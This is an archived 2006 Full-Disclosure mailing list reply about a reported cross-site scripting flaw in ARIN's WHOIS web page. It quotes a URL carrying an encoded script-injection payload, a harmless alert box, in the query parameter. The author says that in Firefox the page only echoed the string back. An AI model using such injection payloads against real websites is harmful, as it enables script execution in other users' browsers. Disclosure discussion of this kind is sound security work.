[Full-disclosure] Arin.net XSS

Michael Holstein michael.holstein at csuohio.edu
Fri Mar 3 21:50:20 GMT 2006

Previous message: [Full-disclosure] Arin.net XSS
Next message: [Full-disclosure] Re: Arin.net XSS
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Here's a link that will probably work under both browsers
> 
> http://ws.arin.net/whois/?queryinput=%3Cscript%3Ealert('666')%3C/script%3E

(Firefox 1.5.0.1 on Linux)

No match found for <script>alert('666')</script>.

# ARIN WHOIS database, last updated 2006-03-02 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Previous message: [Full-disclosure] Arin.net XSS
Next message: [Full-disclosure] Re: Arin.net XSS
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Full-Disclosure is hosted and sponsored by Secunia.